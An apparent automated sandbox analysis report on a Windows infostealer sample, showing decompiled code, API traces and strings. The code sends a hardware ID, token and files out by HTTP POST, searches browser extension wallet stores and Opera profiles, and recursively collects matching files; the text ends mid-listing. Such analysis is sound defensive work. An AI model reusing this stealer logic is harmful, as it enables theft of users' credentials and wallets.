Instruction Fuzzy Hash: B9F082751002016F8B307E69940402DBFECAE90725798181EF64CBB690C720AD92C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00E82CD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E82CD1() {
				struct _STARTUPINFOW _v72;
				void* _t10;

				memset( &_v72, 0, 0x44);
				GetStartupInfoW( &_v72);
				if((_v72.dwFlags & 0x00000001) == 0) {
					_t10 = 0xa;
					return _t10;
				} else {
					return _v72.wShowWindow & 0x0000ffff;
				}
			}

0x00e82cdf
0x00e82ceb
0x00e82cf5
0x00e82cff
0x00e82d01
0x00e82cf7
0x00e82cfc
0x00e82cfc

APIs

memset.VCRUNTIME140(?,00000000,00000044), ref: 00E82CDF
GetStartupInfoW.KERNEL32(?), ref: 00E82CEB

Strings

PP)w, xrefs: 00E82CEB

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: InfoStartupmemset
String ID: PP)w
API String ID: 915265200-215123322
Opcode ID: febbb9cac5120860e5c3b2cfec661adfa9faf6fcb0dccc68c39d5d50a54babee
Instruction ID: 602873b2efadaafac73536c1bed54687342c1e2410b152c2e6279ef39c79ba4a
Opcode Fuzzy Hash: febbb9cac5120860e5c3b2cfec661adfa9faf6fcb0dccc68c39d5d50a54babee
Instruction Fuzzy Hash: 11E012F1A4034D56DB10E7E5A94BBAEB7B85B00748F100015AB09F51C0E6E4E649C3A6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: file.exePID: 5896, Parent PID: 5924COMMON

Execution Graph

Execution Coverage:	22.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 0040E905 Relevance: 185.9, APIs: 86, Strings: 20, Instructions: 446
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E971
_memset.LIBCMT ref: 0040E984
_memset.LIBCMT ref: 0040E996
GetProcessHeap.KERNEL32(00000000,00800000,?,00000000,?,?,00000000,?,00000000,?,?), ref: 0040E9A4
RtlAllocateHeap.NTDLL(00000000), ref: 0040E9AB
_memset.LIBCMT ref: 0040E9C0
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E9D0
InternetSetOptionA.WININET ref: 0040E9F2
StrCmpCA.SHLWAPI(?,?,?,?,https://), ref: 0040EA0E
lstrcat.KERNEL32(?,00000000), ref: 0040EA3A
lstrcat.KERNEL32(?,0043F5AC), ref: 0040EA4C
lstrcat.KERNEL32(?,------), ref: 0040EA5E
lstrcat.KERNEL32(?,?), ref: 0040EA71
lstrcat.KERNEL32(?,0043F5B8), ref: 0040EA82
lstrcat.KERNEL32(?,0043F5AC), ref: 0040EA8F
lstrcat.KERNEL32(?,Cont), ref: 0040EAA1
lstrcat.KERNEL32(?,ent-Typ), ref: 0040EAB3
lstrcat.KERNEL32(?,e: multip), ref: 0040EAC5
lstrcat.KERNEL32(?,art/for), ref: 0040EAD7
lstrcat.KERNEL32(?,m-data; ), ref: 0040EAE9
lstrcat.KERNEL32(?,boun), ref: 0040EAFB
lstrcat.KERNEL32(?,dary=), ref: 0040EB0D
lstrcat.KERNEL32(?,----), ref: 0040EB1F
lstrcat.KERNEL32(?,?), ref: 0040EB33
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EB4E
HttpOpenRequestA.WININET(?,POST,0043F4D4,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 0040EB8E
lstrcat.KERNEL32(?,------), ref: 0040EBAA
lstrcat.KERNEL32(?,?), ref: 0040EBBE
lstrcat.KERNEL32(?,0043F5AC), ref: 0040EBCC
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EBDE
lstrcat.KERNEL32(?,profile), ref: 0040EBF0
lstrcat.KERNEL32(?,"), ref: 0040EC03
lstrcat.KERNEL32(?,?), ref: 0040EC16
lstrcat.KERNEL32(?,0043F5AC), ref: 0040EC24
lstrcat.KERNEL32(?,------), ref: 0040EC36
lstrcat.KERNEL32(?,?), ref: 0040EC4A
lstrcat.KERNEL32(?,0043F5AC), ref: 0040EC58
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EC6A
lstrcat.KERNEL32(?,profile_id), ref: 0040EC7C
lstrcat.KERNEL32(?,"), ref: 0040EC8A
lstrcat.KERNEL32(?,?), ref: 0040EC9D
lstrcat.KERNEL32(?,0043F5AC), ref: 0040ECAB
lstrcat.KERNEL32(?,------), ref: 0040ECBD
lstrcat.KERNEL32(?,?), ref: 0040ECD1
lstrcat.KERNEL32(?,0043F5AC), ref: 0040ECDF
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040ECF1
lstrcat.KERNEL32(?,hwid), ref: 0040ED03
lstrcat.KERNEL32(?,"), ref: 0040ED11
lstrcat.KERNEL32(?,?), ref: 0040ED24
lstrcat.KERNEL32(?,0043F5AC), ref: 0040ED32
lstrcat.KERNEL32(?,------), ref: 0040ED44
lstrcat.KERNEL32(?,?), ref: 0040ED58
lstrcat.KERNEL32(?,0043F5AC), ref: 0040ED66
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040ED78
lstrcat.KERNEL32(?,token), ref: 0040ED8A
lstrcat.KERNEL32(?,"), ref: 0040ED98
lstrcat.KERNEL32(?,?), ref: 0040EDAB
lstrcat.KERNEL32(?,0043F5AC), ref: 0040EDB9
lstrcat.KERNEL32(?,------), ref: 0040EDCB
lstrcat.KERNEL32(?,?), ref: 0040EDDF
lstrcat.KERNEL32(?,0043F5AC), ref: 0040EDED
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EDFF
lstrcat.KERNEL32(?,file), ref: 0040EE11
lstrcat.KERNEL32(?,"), ref: 0040EE1F
lstrlenA.KERNEL32(?,?,?,?,?,https://), ref: 0040EE2B
lstrlenA.KERNEL32(?,?,?,?,?,https://), ref: 0040EE3A
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,https://), ref: 0040EE4A
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,https://), ref: 0040EE51
lstrlenA.KERNEL32(?,?,?,?,?,https://), ref: 0040EE64
_memmove.LIBCMT ref: 0040EE78
lstrlenA.KERNEL32(?,?,?,00000002,?,00000004), ref: 0040EE93
_memmove.LIBCMT ref: 0040EEA0
lstrlenA.KERNEL32(?), ref: 0040EEAE
lstrlenA.KERNEL32(?,?,00000000), ref: 0040EEC2
_memmove.LIBCMT ref: 0040EED5
lstrlenA.KERNEL32(?,?,?), ref: 0040EEED
HttpSendRequestA.WININET(?,?,00000000), ref: 0040EF01
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040EF1E
StrCmpCA.SHLWAPI(?,200), ref: 0040EF34
Sleep.KERNEL32(00007530), ref: 0040EF43
_memset.LIBCMT ref: 0040EF59
lstrcat.KERNEL32(?,?), ref: 0040EF87
InternetReadFile.WININET(?,?,000007CF,?), ref: 0040EFA2
InternetCloseHandle.WININET(?), ref: 0040EFB2
InternetCloseHandle.WININET(?), ref: 0040EFBE
InternetCloseHandle.WININET(?), ref: 0040EFCA

Strings

token, xrefs: 0040ED7E
e: multip, xrefs: 0040EAB9
----, xrefs: 0040EB13
https://, xrefs: 0040E9F8
hwid, xrefs: 0040ECF7
", xrefs: 0040EBF6, 0040EBFB, 0040EC82, 0040ED09, 0040ED90, 0040EE17
POST, xrefs: 0040EB83
profile_id, xrefs: 0040EC70
dary=, xrefs: 0040EB01
------, xrefs: 0040EA52, 0040EA57, 0040EBA2, 0040EC2A, 0040ECB1, 0040ED38, 0040EDBF
profile, xrefs: 0040EBE4
file, xrefs: 0040EE05
200, xrefs: 0040EF28
Content-Disposition: form-data; name=", xrefs: 0040EBD2, 0040EC5E, 0040ECE5, 0040ED6C, 0040EDF3
m-data; , xrefs: 0040EADD
ent-Typ, xrefs: 0040EAA7
HTTP/1.1, xrefs: 0040EB79
boun, xrefs: 0040EAEF
art/for, xrefs: 0040EACB
Cont, xrefs: 0040EA95

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Internetlstrlen$_memset$Heap$CloseHandleHttp_memmove$AllocateOpenProcessRequest$ConnectFileInfoOptionQueryReadSendSleep
String ID: "$----$------$200$Cont$Content-Disposition: form-data; name="$HTTP/1.1$POST$art/for$boun$dary=$e: multip$ent-Typ$file$https://$hwid$m-data; $profile$profile_id$token
API String ID: 2865591797-4214273285
Opcode ID: a64158cd3a8c645f3cc29329c7982df7113b27b5e51e59a3b4762ff8b11afac5
Instruction ID: 9642bba7398eb72401302c2991dcbd3c60d633cf8fb6cdada0bbf799164a92ca
Opcode Fuzzy Hash: a64158cd3a8c645f3cc29329c7982df7113b27b5e51e59a3b4762ff8b11afac5
Instruction Fuzzy Hash: 9102FEB6C04229BBDB20AFA0DD4CDDA7B7DFB09355F1044B6B619E2021D7349B868F54

Uniqueness

Uniqueness Score: -1.00%

Function 004135E2 Relevance: 80.9, APIs: 40, Strings: 6, Instructions: 379
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E004135E2(CHAR* __ecx, CHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				char _v1332;
				char _v1596;
				char _v1860;
				char _v2124;
				struct _WIN32_FIND_DATAA _v2444;
				intOrPtr _v2448;
				intOrPtr _v2452;
				intOrPtr _v2456;
				CHAR* _v2460;
				CHAR* _v2464;
				void* _v2468;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t130;
				void* _t140;
				signed char _t162;
				signed char _t164;
				signed char _t166;
				int _t178;
				int _t195;
				signed char _t234;
				signed char _t239;
				signed char _t244;
				void* _t248;
				CHAR* _t259;
				CHAR* _t260;
				CHAR* _t261;
				signed int _t262;
				void* _t263;
				void* _t264;
				void* _t276;

				_t258 = __edx;
				_t130 =  *0x444664; // 0xfa3a0753
				_v8 = _t130 ^ _t262;
				_v2456 = _a4;
				_v2448 = _a8;
				_t260 = __edx;
				_v2452 = _a12;
				_t259 = __ecx;
				_v2464 = __ecx;
				_v2460 = __edx;
				wsprintfA( &_v2124, "%s\\*.*", __edx);
				_t264 = _t263 + 0xc;
				if(_a20 != 0) {
					_t248 = 0x104;
					E0041F6B0( &_v276, 0, 0x104);
					_t140 = _a20 - 1;
					if(_t140 == 0) {
						_push("Opera Stable");
						L24:
						 *0x4474e0( &_v276);
						L25:
						_t259 = "%s\\%s\\%s\\%s";
						wsprintfA( &_v1068, _t259, _t260,  &_v276,  *0x447048, _t259);
						_t261 = "%s\\%s";
						wsprintfA( &_v1860, _t261,  &_v1068,  *0x446a5c);
						wsprintfA( &_v804, _t259, _v2460,  &_v276,  *0x446ea8, _v2464);
						wsprintfA( &_v1596, _t261,  &_v804,  *0x446a5c);
						wsprintfA( &_v540, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _v2460,  &_v276,  *0x446b58, _v2464);
						wsprintfA( &_v1332, _t261,  &_v540,  *0x446a5c);
						_t162 = GetFileAttributesA( &_v1860); // executed
						if(_t162 != 0xffffffff && (_t162 & 0x00000010) == 0) {
							E004132B0(_v2448, _t258, _v2456,  &_v1068, _v2452,  &_v276, _a16, 1);
						}
						_t164 = GetFileAttributesA( &_v1596); // executed
						if(_t164 != 0xffffffff && (_t164 & 0x00000010) == 0) {
							E004132B0(_v2448, _t258, _v2456,  &_v804, _v2452,  &_v276, _a16, 2);
						}
						_t166 = GetFileAttributesA( &_v1332); // executed
						if(_t166 != 0xffffffff && (_t166 & 0x00000010) == 0) {
							E004132B0(_v2448, _t258, _v2456,  &_v540, _v2452,  &_v276, _a16, 3);
						}
						_t260 = 0;
						E0041F6B0( &_v1068, 0, _t248);
						E0041F6B0( &_v1860, 0, _t248);
						E0041F6B0( &_v804, 0, _t248);
						E0041F6B0( &_v1596, 0, _t248);
						E0041F6B0( &_v540, 0, _t248);
						_t178 = E0041F6B0( &_v1332, 0, _t248);
						L35:
						return E0041F69E(_t178, _t248, _v8 ^ _t262, _t258, _t259, _t260);
					}
					if(_t140 != 1) {
						goto L25;
					}
					_push("Opera GX Stable");
					goto L24;
				}
				_t178 = FindFirstFileA( &_v2124,  &_v2444); // executed
				_v2468 = _t178;
				if(_t178 != 0xffffffff) {
					_t248 = 0x104;
					_t259 = "%s\\%s\\%s\\%s";
					_t260 = "%s\\%s";
					do {
						_push(".");
						_push( &(_v2444.cFileName));
						if( *0x447510() == 0) {
							goto L18;
						}
						_push("..");
						_push( &(_v2444.cFileName));
						if( *0x447510() == 0) {
							goto L18;
						}
						E0041F6B0( &_v276, 0, _t248);
						 *0x4474e0( &_v276,  &(_v2444.cFileName));
						wsprintfA( &_v540, _t259, _v2460,  &_v276,  *0x447048, _v2464);
						wsprintfA( &_v1332, _t260,  &_v540,  *0x446a5c);
						wsprintfA( &_v804, _t259, _v2460,  &_v276,  *0x446ea8, _v2464);
						wsprintfA( &_v1596, _t260,  &_v804,  *0x446a5c);
						wsprintfA( &_v1068, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _v2460,  &_v276,  *0x446b58, _v2464);
						wsprintfA( &_v1860, _t260,  &_v1068,  *0x446a5c);
						_t276 = _t264 + 0x84;
						if(_a24 != 0) {
							_t244 = GetFileAttributesA( &_v1332); // executed
							if(_t244 != 0xffffffff && (_t244 & 0x00000010) == 0) {
								E004132B0(_v2448, _t258, _v2456,  &_v540, _v2452,  &_v276, _a16, 1);
							}
						}
						if(_a28 != 0) {
							_t239 = GetFileAttributesA( &_v1596); // executed
							if(_t239 != 0xffffffff && (_t239 & 0x00000010) == 0) {
								E004132B0(_v2448, _t258, _v2456,  &_v804, _v2452,  &_v276, _a16, 2);
							}
						}
						if(_a32 != 0) {
							_t234 = GetFileAttributesA( &_v1860); // executed
							if(_t234 != 0xffffffff && (_t234 & 0x00000010) == 0) {
								E004132B0(_v2448, _t258, _v2456,  &_v1068, _v2452,  &_v276, _a16, 3);
							}
						}
						E0041F6B0( &_v540, 0, _t248);
						E0041F6B0( &_v1332, 0, _t248);
						E0041F6B0( &_v804, 0, _t248);
						E0041F6B0( &_v1596, 0, _t248);
						E0041F6B0( &_v1068, 0, _t248);
						E0041F6B0( &_v1860, 0, _t248);
						_t264 = _t276 + 0x48;
						L18:
						_t195 = FindNextFileA(_v2468,  &_v2444); // executed
					} while (_t195 != 0);
					_t178 = FindClose(_v2468);
				}
			}

0x004135e2
0x004135eb
0x004135f2
0x004135fa
0x00413604
0x0041360d
0x00413610
0x0041361c
0x00413624
0x0041362a
0x00413630
0x00413636
0x0041363d
0x00413909
0x00413918
0x00413923
0x00413924
0x00413930
0x00413935
0x0041393c
0x00413942
0x00413951
0x0041395e
0x00413971
0x0041397e
0x004139a5
0x004139c3
0x004139ee
0x00413a09
0x00413a19
0x00413a22
0x00413a4d
0x00413a4d
0x00413a59
0x00413a62
0x00413a8d
0x00413a8d
0x00413a99
0x00413aa2
0x00413acd
0x00413acd
0x00413ad3
0x00413add
0x00413aee
0x00413aff
0x00413b10
0x00413b21
0x00413b32
0x00413b3a
0x00413b48
0x00413b48
0x00413927
0x00000000
0x00000000
0x00413929
0x00000000
0x00413929
0x00413651
0x00413657
0x00413660
0x00413666
0x0041366b
0x00413670
0x00413675
0x00413675
0x00413680
0x00413689
0x00000000
0x00000000
0x0041368f
0x0041369a
0x004136a3
0x00000000
0x00000000
0x004136b3
0x004136c9
0x004136f0
0x0041370b
0x00413732
0x00413750
0x0041377b
0x00413796
0x0041379c
0x004137a3
0x004137ac
0x004137b5
0x004137e0
0x004137e0
0x004137b5
0x004137e9
0x004137f2
0x004137fb
0x00413826
0x00413826
0x004137fb
0x0041382f
0x00413838
0x00413841
0x0041386c
0x0041386c
0x00413841
0x0041387b
0x0041388d
0x0041389f
0x004138b1
0x004138c3
0x004138d5
0x004138da
0x004138dd
0x004138ea
0x004138f0
0x004138fe
0x004138fe

APIs

wsprintfA.USER32 ref: 00413630
FindFirstFileA.KERNEL32(?,?), ref: 00413651
StrCmpCA.SHLWAPI(?,0043F354), ref: 00413681
StrCmpCA.SHLWAPI(?,0043F358), ref: 0041369B
_memset.LIBCMT ref: 004136B3
lstrcat.KERNEL32(?,?), ref: 004136C9
wsprintfA.USER32 ref: 004136F0
wsprintfA.USER32 ref: 0041370B
wsprintfA.USER32 ref: 00413732
wsprintfA.USER32 ref: 00413750
wsprintfA.USER32 ref: 0041377B
wsprintfA.USER32 ref: 00413796
GetFileAttributesA.KERNELBASE(?), ref: 004137AC

Part of subcall function 004132B0: wsprintfA.USER32 ref: 004132FD
Part of subcall function 004132B0: FindFirstFileA.KERNEL32(?,?), ref: 00413314
Part of subcall function 004132B0: StrCmpCA.SHLWAPI(?,0043F354), ref: 0041334A
Part of subcall function 004132B0: StrCmpCA.SHLWAPI(?,0043F358), ref: 00413364
Part of subcall function 004132B0: _memset.LIBCMT ref: 0041337B
Part of subcall function 004132B0: _memset.LIBCMT ref: 0041338C
Part of subcall function 004132B0: lstrcat.KERNEL32(?,?), ref: 004133A1
Part of subcall function 004132B0: lstrcat.KERNEL32(?,0043D134), ref: 004133AF
Part of subcall function 004132B0: lstrcat.KERNEL32(?,?), ref: 004133C3
Part of subcall function 004132B0: lstrcat.KERNEL32(?,0043D134), ref: 004133D1
Part of subcall function 004132B0: lstrcat.KERNEL32(?), ref: 004133F1
Part of subcall function 004132B0: lstrcat.KERNEL32(?,0043D134), ref: 004133FF
Part of subcall function 004132B0: lstrcat.KERNEL32(?,?), ref: 00413412
Part of subcall function 004132B0: lstrcat.KERNEL32(?,0043D134), ref: 00413420

GetFileAttributesA.KERNELBASE(?), ref: 004137F2
GetFileAttributesA.KERNELBASE(?), ref: 00413838
_memset.LIBCMT ref: 0041387B
_memset.LIBCMT ref: 0041388D
_memset.LIBCMT ref: 0041389F
_memset.LIBCMT ref: 004138B1
_memset.LIBCMT ref: 004138C3
_memset.LIBCMT ref: 004138D5
FindNextFileA.KERNELBASE(?,?), ref: 004138EA
FindClose.KERNEL32(?), ref: 004138FE
_memset.LIBCMT ref: 00413918
lstrcat.KERNEL32(?,Opera Stable), ref: 0041393C
wsprintfA.USER32 ref: 0041395E
wsprintfA.USER32 ref: 0041397E
wsprintfA.USER32 ref: 004139A5
wsprintfA.USER32 ref: 004139C3
wsprintfA.USER32 ref: 004139EE
wsprintfA.USER32 ref: 00413A09
GetFileAttributesA.KERNEL32(?), ref: 00413A19
GetFileAttributesA.KERNEL32(?), ref: 00413A59
GetFileAttributesA.KERNEL32(?), ref: 00413A99
_memset.LIBCMT ref: 00413ADD
_memset.LIBCMT ref: 00413AEE
_memset.LIBCMT ref: 00413AFF
_memset.LIBCMT ref: 00413B10
_memset.LIBCMT ref: 00413B21
_memset.LIBCMT ref: 00413B32

Strings

%s\%s\%s\%s, xrefs: 0041366B, 004136EE, 00413730, 00413951, 0041395C, 004139A3
%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb, xrefs: 00413775, 004139E8
%s\%s, xrefs: 00413670, 00413709, 0041374E, 00413794, 00413971, 0041397C, 004139C1, 00413A07
%s\*.*, xrefs: 0041361E
Opera Stable, xrefs: 00413930
Opera GX Stable, xrefs: 00413929

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$wsprintf$lstrcat$File$Attributes$Find$First$CloseNext
String ID: %s\%s$%s\%s\%s\%s$%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb$%s\*.*$Opera GX Stable$Opera Stable
API String ID: 3814941161-549290927
Opcode ID: afcb4108f75154c7b9f6372f7677765988f528f6f854f62405d186cd247ff2b0
Instruction ID: ca3b2a7240d8d9c3379ffcba5f07c1a817266224f064671172845f4b70899f65
Opcode Fuzzy Hash: afcb4108f75154c7b9f6372f7677765988f528f6f854f62405d186cd247ff2b0
Instruction Fuzzy Hash: 5CE12CB290111DABDF219F94DC49EEA7B7DEB09304F0404EAF509A2161E7349B9ACF58

Uniqueness

Uniqueness Score: -1.00%

Function 00409DF4 Relevance: 72.1, APIs: 38, Strings: 3, Instructions: 354
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E00409DF4(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, intOrPtr _a24, CHAR* _a28, intOrPtr _a32, int _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v1540;
				char _v1804;
				char _v2804;
				char _v7804;
				struct _WIN32_FIND_DATAA _v8124;
				intOrPtr _v8128;
				intOrPtr _v8132;
				intOrPtr _v8136;
				char* _v8140;
				intOrPtr _v8144;
				void* _v8148;
				intOrPtr _v8152;
				char _v8156;
				CHAR* _v8160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t109;
				intOrPtr _t113;
				void* _t118;
				int _t122;
				int _t127;
				void* _t130;
				void* _t142;
				int _t149;
				int _t165;
				char* _t166;
				int _t170;
				int _t177;
				CHAR* _t192;
				int _t194;
				char* _t201;
				void* _t215;
				void* _t230;
				CHAR* _t231;
				signed int _t233;
				void* _t234;
				void* _t236;
				void* _t238;
				intOrPtr _t239;
				void* _t258;

				_t230 = __edx;
				E0042E350(0x1fdc);
				_t109 =  *0x444664; // 0xfa3a0753
				_v8 = _t109 ^ _t233;
				_v8128 = _a4;
				_t231 = _a28;
				_v8136 = _a8;
				_t113 = _a12;
				_v8132 = _t113;
				_v8140 = _a16;
				_v8160 = _t231;
				wsprintfA( &_v1804, "%s\\*", _t113);
				_t118 = FindFirstFileA( &_v1804,  &_v8124); // executed
				_v8148 = _t118;
				E0041F6B0( &_v7804, 0, 0x1388);
				_t236 = _t234 + 0x18;
				_t122 =  *0x4474e0( &_v7804, _t231);
				if(_v8148 != 0xffffffff) {
					do {
						_push(".");
						_push( &(_v8124.cFileName));
						if( *0x447510() == 0) {
							goto L46;
						} else {
							_push("..");
							_push( &(_v8124.cFileName));
							if( *0x447510() == 0) {
								goto L46;
							} else {
								_t130 = E00409CAB(_v8132, _t230, 0x80000000); // executed
								_pop(_t221);
								if(_t130 == 0) {
									goto L46;
								} else {
									 *0x44758c( &_v540, _v8132);
									_t231 = "\\";
									 *0x4474e0( &_v540, _t231);
									 *0x4474e0( &_v540,  &(_v8124.cFileName));
									_t244 = _a36;
									if(_a36 != 0) {
										L7:
										E0041F6B0( &_v1540, 0, 0x3e8);
										E0041F6B0( &_v2804, 0, 0x3e8);
										_t238 = _t236 + 0x18;
										_t142 =  *0x447510(_v8136, 0x43d12c);
										_push( &(_v8124.cFileName));
										if(_t142 != 0) {
											_push(_v8136);
											wsprintfA( &_v2804, "%s\\%s");
											_t236 = _t238 + 0x10;
										} else {
											wsprintfA( &_v2804, "%s");
											_t236 = _t238 + 0xc;
										}
										if(lstrlenA( &_v7804) <= 3) {
											__eflags = _a36;
											if(_a36 == 0) {
												L34:
												_t149 = PathMatchSpecA( &(_v8124.cFileName), _v8140);
												__eflags = _t149;
												if(_t149 == 0) {
													goto L43;
												} else {
													 *0x44758c( &_v276, _v8136);
													_push(_t231);
													goto L36;
												}
											} else {
												_t170 = PathMatchSpecA( &(_v8124.cFileName), "*.lnk");
												__eflags = _t170;
												if(_t170 == 0) {
													goto L34;
												} else {
													 *0x447504(0);
													E00409872( &_v540,  &_v1540);
													_pop(_t221);
													 *0x4474e8();
													_t177 = PathMatchSpecA( &_v1540, _v8140);
													__eflags = _t177;
													if(_t177 == 0) {
														goto L43;
													} else {
														 *0x44758c( &_v276, _v8136);
														_push(_t231);
														goto L24;
													}
												}
											}
										} else {
											_t192 = E00421D3B(0x3e8, _t230, _t231,  &_v7804, ":",  &_v8156);
											_t236 = _t236 + 0xc;
											_t231 = _t192;
											_v8152 = 0;
											_v8144 = 0;
											if(_a36 != 0 && PathMatchSpecA( &(_v8124.cFileName), "*.lnk") != 0) {
												_v8144 = 1;
												 *0x447504(0);
												E00409872( &_v540,  &_v1540);
												_pop(_t221);
												 *0x4474e8();
											}
											if(_t231 == 0) {
												L21:
												_push(_v8140);
												if(_v8144 == 0) {
													_t194 = PathMatchSpecA( &(_v8124.cFileName));
													__eflags = _t194;
													if(_t194 == 0) {
														goto L43;
													} else {
														 *0x44758c( &_v276, _v8136);
														_push("\\");
														L36:
														 *0x4474e0( &_v276);
														 *0x4474e0( &_v276,  &(_v8124.cFileName));
														_t231 = E0042A180(E0041803D(_t221,  &_v540), _t230, 0x3e8, 0);
														__eflags = _a24 - _t231;
														if(_a24 <= _t231) {
															goto L43;
														} else {
															_t122 =  *0x4472a8; // 0x9c40
															__eflags = _t122 -  *0x4472b4; // 0x0
															if(__eflags > 0) {
																_t165 = E00409CAB(_v8132, _t230, 0xc0000000);
																__eflags = _t165;
																if(_t165 != 0) {
																	_t166 =  &_v540;
																	goto L40;
																}
																goto L43;
															}
														}
													}
												} else {
													if(PathMatchSpecA( &_v1540) == 0) {
														goto L43;
													} else {
														 *0x44758c( &_v276, _v8136);
														_push("\\");
														L24:
														 *0x4474e0( &_v276);
														 *0x4474e0( &_v276, PathFindFileNameA( &_v1540));
														_t231 = E0042A180(E0041803D(_t221,  &_v1540), _t230, 0x3e8, 0);
														if(_a24 <= _t231) {
															goto L43;
														} else {
															_t122 =  *0x4472a8; // 0x9c40
															_t258 = _t122 -  *0x4472b4; // 0x0
															if(_t258 > 0) {
																if(E00409CAB(_v8132, _t230, 0xc0000000) != 0) {
																	_t166 =  &_v1540;
																	L40:
																	_push(2);
																	_push(0);
																	if(_a32 == 0) {
																		_t166 =  &_v276;
																	}
																	_push(_t166);
																	E0041EAE0(_v8128);
																	_t236 = _t236 + 0xc;
																	 *0x4472b4 =  *0x4472b4 + _t231;
																}
																goto L43;
															}
														}
													}
												}
											} else {
												do {
													_push(0);
													_push(_t231);
													_t201 =  &_v1540;
													if(_v8144 == 0) {
														_t201 =  &(_v8124.cFileName);
													}
													_push(_t201);
													if( *0x447450() != 0) {
														_v8152 = 1;
													}
													_t231 = E00421D3B(0x3e8, _t230, _t231, 0, ":",  &_v8156);
													_t236 = _t236 + 0xc;
												} while (_t231 != 0);
												if(_v8152 != 0) {
													L43:
													if(_a20 == 0) {
														goto L46;
													} else {
														_t150 = _a48;
														if(_a48 > _a44) {
															break;
														} else {
															E00409DF4(_t230, _v8128,  &_v2804,  &_v540, _v8140, _a20, _a24, _v8160, _a32, _a36, _a40, _a44, _t150 + 1); // executed
															_t236 = _t236 + 0x30;
															goto L46;
														}
													}
												} else {
													goto L21;
												}
											}
										}
									} else {
										_t239 = _t236 - 0x1c;
										_t221 = _t239;
										_v8144 = _t239;
										E004049CF(_t239,  &_v540);
										_t215 = E00409991(0x3e8, _t239, _t231, 0, _t244);
										_t236 = _t239 + 0x1c;
										if(_t215 != 0) {
											goto L46;
										} else {
											goto L7;
										}
									}
								}
							}
						}
						goto L48;
						L46:
						_t127 = FindNextFileA(_v8148,  &_v8124); // executed
					} while (_t127 != 0);
					_t122 = FindClose(_v8148);
				}
				L48:
				return E0041F69E(_t122, 0x3e8, _v8 ^ _t233, _t230, _t231, 0);
			}

0x00409df4
0x00409dfc
0x00409e01
0x00409e08
0x00409e12
0x00409e1d
0x00409e20
0x00409e26
0x00409e2a
0x00409e3c
0x00409e42
0x00409e48
0x00409e5f
0x00409e6a
0x00409e7a
0x00409e7f
0x00409e8a
0x00409e97
0x00409ea2
0x00409ea2
0x00409ead
0x00409eb6
0x00000000
0x00409ebc
0x00409ebc
0x00409ec7
0x00409ed0
0x00000000
0x00409ed6
0x00409ee1
0x00409ee6
0x00409ee9
0x00000000
0x00409eef
0x00409efc
0x00409f02
0x00409f0f
0x00409f23
0x00409f29
0x00409f2c
0x00409f55
0x00409f5e
0x00409f6f
0x00409f74
0x00409f82
0x00409f90
0x00409f97
0x00409faa
0x00409fb6
0x00409fbc
0x00409f99
0x00409f9f
0x00409fa5
0x00409fa5
0x00409fcf
0x0040a18b
0x0040a18e
